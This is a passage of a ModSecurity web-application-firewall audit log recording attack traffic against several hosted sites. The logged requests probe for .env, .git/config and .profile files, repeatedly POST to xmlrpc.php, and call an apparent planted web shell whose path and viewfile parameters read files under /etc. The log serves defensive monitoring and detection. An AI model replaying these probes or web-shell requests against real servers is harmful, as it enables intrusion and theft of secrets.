policy||www.dealsdray.com|F|2"] [data ".env.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.dealsdray.com"] [uri "/.env.old"] [unique_id "aE7Y5jAyUstaws9su_zdPAAAAAY"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.dealsdray.com|F|2"] [data ".env.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.dealsdray.com"] [uri "/.env.old"] [unique_id "aE7Y5jAyUstaws9su_zdPAAAAAY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749997798708344 968692 (- - -) Stopwatch2: 1749997798708344 968692; combined=1964, p1=393, p2=1444, p3=0, p4=0, p5=127, sr=110, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7598ba21-Z-- --51d49540-A-- [15/Jun/2025:20:00:00.986287 +0530] aE7Y6IeMkDifvSpLI-IyhgAAAAQ 185.177.72.204 57192 127.0.0.1 7081 --51d49540-B-- GET /.env.prod HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 185.177.72.204 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --51d49540-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --51d49540-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.dealsdray.com"] [uri "/.env.prod"] [unique_id "aE7Y6IeMkDifvSpLI-IyhgAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749997800006898 979453 (- - -) Stopwatch2: 1749997800006898 979453; combined=1640, p1=372, p2=1185, p3=0, p4=0, p5=83, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --51d49540-Z-- --10b1db46-A-- [15/Jun/2025:20:00:02.535081 +0530] aE7Y6c4alP8kudWMP5CVoAAAAAE 185.177.72.204 57260 127.0.0.1 7081 --10b1db46-B-- GET /.env.production.local HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 185.177.72.204 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --10b1db46-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --10b1db46-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.dealsdray.com"] [uri "/.env.production.local"] [unique_id "aE7Y6c4alP8kudWMP5CVoAAAAAE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749997801327560 1207600 (- - -) Stopwatch2: 1749997801327560 1207600; combined=2223, p1=483, p2=1625, p3=0, p4=0, p5=114, sr=102, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --10b1db46-Z-- --2739b328-A-- [15/Jun/2025:20:00:03.947970 +0530] aE7Y6gG_OhOIIVz6TXRwtQAAAAA 185.177.72.204 57330 127.0.0.1 7081 --2739b328-B-- GET /.env.stage HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 185.177.72.204 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --2739b328-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --2739b328-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.dealsdray.com"] [uri "/.env.stage"] [unique_id "aE7Y6gG_OhOIIVz6TXRwtQAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749997802865525 1082511 (- - -) Stopwatch2: 1749997802865525 1082511; combined=2625, p1=522, p2=1983, p3=0, p4=0, p5=119, sr=143, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2739b328-Z-- --489a0913-A-- [15/Jun/2025:20:00:05.458114 +0530] aE7Y7DAyUstaws9su_zdPwAAAAY 185.177.72.204 57426 127.0.0.1 7081 --489a0913-B-- GET /admin/.env HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 185.177.72.204 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --489a0913-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --489a0913-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.dealsdray.com"] [uri "/admin/.env"] [unique_id "aE7Y7DAyUstaws9su_zdPwAAAAY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749997804278886 1179284 (- - -) Stopwatch2: 1749997804278886 1179284; combined=1923, p1=391, p2=1442, p3=0, p4=0, p5=89, sr=97, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --489a0913-Z-- --75a6ad5a-A-- [15/Jun/2025:20:00:06.784827 +0530] aE7Y7dg39TKi8vFFY7LdxQAAAAI 185.177.72.204 57482 127.0.0.1 7081 --75a6ad5a-B-- GET /api/.env HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 185.177.72.204 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --75a6ad5a-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --75a6ad5a-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.dealsdray.com"] [uri "/api/.env"] [unique_id "aE7Y7dg39TKi8vFFY7LdxQAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749997805787903 996979 (- - -) Stopwatch2: 1749997805787903 996979; combined=2198, p1=512, p2=1593, p3=0, p4=0, p5=92, sr=115, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --75a6ad5a-Z-- --6de3d804-A-- [15/Jun/2025:20:00:08.122210 +0530] aE7Y71u1-lKBbvo2E9pS2AAAAAw 185.177.72.204 57536 127.0.0.1 7081 --6de3d804-B-- GET /apps/.env HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 185.177.72.204 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --6de3d804-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --6de3d804-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.dealsdray.com"] [uri "/apps/.env"] [unique_id "aE7Y71u1-lKBbvo2E9pS2AAAAAw"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749997807129810 992480 (- - -) Stopwatch2: 1749997807129810 992480; combined=1896, p1=382, p2=1403, p3=0, p4=0, p5=110, sr=95, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6de3d804-Z-- --8a6bce0b-A-- [15/Jun/2025:20:00:13.086228 +0530] aE7Y9IeMkDifvSpLI-IyiwAAAAQ 185.177.72.204 38622 127.0.0.1 7081 --8a6bce0b-B-- GET /.git/config HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 185.177.72.204 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --8a6bce0b-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --8a6bce0b-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.dealsdray.com"] [uri "/.git/config"] [unique_id "aE7Y9IeMkDifvSpLI-IyiwAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749997812110766 975544 (- - -) Stopwatch2: 1749997812110766 975544; combined=1807, p1=377, p2=1316, p3=0, p4=0, p5=113, sr=94, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --8a6bce0b-Z-- --01517e32-A-- [15/Jun/2025:20:00:39.934675 +0530] aE7ZD1u1-lKBbvo2E9pS9AAAAAw 128.199.112.101 58180 127.0.0.1 7081 --01517e32-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 485 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --01517e32-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --01517e32-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (49+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (49+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7ZD1u1-lKBbvo2E9pS9AAAAAw"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749997839002594 932149 (- - -) Stopwatch2: 1749997839002594 932149; combined=2346, p1=368, p2=1557, p3=43, p4=66, p5=195, sr=101, sw=117, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --01517e32-Z-- --41ffd80d-A-- [15/Jun/2025:20:01:19.412271 +0530] aE7ZNlu1-lKBbvo2E9pTFgAAAAw 185.177.72.204 50870 127.0.0.1 7081 --41ffd80d-B-- GET /resources/application.conf HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 185.177.72.204 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --41ffd80d-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --41ffd80d-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.dealsdray.com|F|2"] [data ".conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.dealsdray.com|F|2"] [data ".conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.dealsdray.com"] [uri "/resources/application.conf"] [unique_id "aE7ZNlu1-lKBbvo2E9pTFgAAAAw"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749997878407018 1005311 (- - -) Stopwatch2: 1749997878407018 1005311; combined=1770, p1=388, p2=1276, p3=0, p4=0, p5=106, sr=132, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --41ffd80d-Z-- --3a70765e-A-- [15/Jun/2025:20:01:35.893430 +0530] aE7ZR7Qco3e4Gnif-OQjRAAAABg 3.220.148.166 49526 127.0.0.1 7081 --3a70765e-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc/init.d&viewfile=//etc/init.d/rsync HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 3.220.148.166 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --3a70765e-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4451 Connection: close Content-Type: text/html; charset=UTF-8 --3a70765e-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /etc/init.d/rsync"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE7ZR7Qco3e4Gnif-OQjRAAAABg"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /etc/init.d/rsync"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE7ZR7Qco3e4Gnif-OQjRAAAABg"] Apache-Handler: application/x-httpd-php Stopwatch: 1749997895889252 4229 (- - -) Stopwatch2: 1749997895889252 4229; combined=2077, p1=318, p2=1610, p3=36, p4=35, p5=78, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3a70765e-Z-- --a07d327b-A-- [15/Jun/2025:20:01:40.286341 +0530] aE7ZS5K-05zbifgH_rT2lAAAAAU 128.199.112.101 41630 127.0.0.1 7081 --a07d327b-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 487 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: application/xml --a07d327b-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --a07d327b-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (48+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 128.199.112.101 (48+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE7ZS5K-05zbifgH_rT2lAAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749997899334243 952155 (- - -) Stopwatch2: 1749997899334243 952155; combined=2351, p1=409, p2=1533, p3=41, p4=67, p5=193, sr=124, sw=108, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a07d327b-Z-- --2b6f997b-A-- [15/Jun/2025:20:01:44.463893 +0530] aE7ZUAG_OhOIIVz6TXRw-wAAAAA 44.206.65.8 41872 127.0.0.1 7081 --2b6f997b-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc/sysctl.d&viewfile=//etc/sysctl.d/10-console-messages.conf HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 44.206.65.8 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --2b6f997b-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3010 Connection: close Content-Type: text/html; charset=UTF-8 --2b6f997b-H-- Message: Warning. Matched phrase "etc/sysctl.d/10-console-messages.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/sysctl.d/10-console-messages.conf found within ARGS:viewfile: /etc/sysctl.d/10-console-messages.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/sysctl.d/10-console-messages.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/sysctl.d/10-console-messages.conf found within ARGS:viewfile: /etc/sysctl.d/10-console-messages.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE7ZUAG_OhOIIVz6TXRw-wAAAAA"] Apache-Handler: application/x-httpd-php Stopwatch: 1749997904459139 4817 (- - -) Stopwatch2: 1749997904459139 4817; combined=2642, p1=372, p2=2104, p3=41, p4=38, p5=87, sr=108, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2b6f997b-Z-- --c254e713-A-- [15/Jun/2025:20:02:18.015283 +0530] aE7ZcAG_OhOIIVz6TXRxCQAAAAA 185.177.72.204 46264 127.0.0.1 7081 --c254e713-B-- GET /.profile HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 185.177.72.204 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --c254e713-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --c254e713-H-- Message: Warning. String match "/.profile" at REQUEST_FILENAME. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "6621"] [id "243320"] [rev "1"] [msg "COMODO WAF: Information disclosure vulnerability in Cloud Foundry PHP Buildpack (aka php-buildpack) before 4.3.18 and PHP Buildpack Cf-release before 242, as used in Pivotal Cloud Foundry (PCF) Elastic Runtime before 1.6.38 and 1.7.x before 1.7.19 and other products (CVE-2016-6639)||www.dealsdray.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. String match "/.profile" at REQUEST_FILENAME. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "6621"] [id "243320"] [rev "1"] [msg "COMODO WAF: Information disclosure vulnerability in Cloud Foundry PHP Buildpack (aka php-buildpack) before 4.3.18 and PHP Buildpack Cf-release before 242, as used in Pivotal Cloud Foundry (PCF) Elastic Runtime before 1.6.38 and 1.7.x before 1.7.19 and other products (CVE-2016-6639)||www.dealsdray.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "www.dealsdray.com"] [uri "/.profile"] [unique_id "aE7ZcAG_OhOIIVz6TXRxCQAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749997936970080 1045279 (- - -) Stopwatch2: 1749997936970080 1045279; combined=1847, p1=343, p2=1367, p3=0, p4=0, p5=137, sr=103, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c254e713-Z-- --f9b7fb0c-A-- [15/Jun/2025:20:02:40.855805 +0530] aE7Zh7Qco3e4Gnif-OQjXwAAABg 128.199.112.101 38790 127.0.0.1 7081 --f9b7fb0c-B-- POST //xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 128.199.112.101 X-Accel-Internal: /internal-nginx-static-location 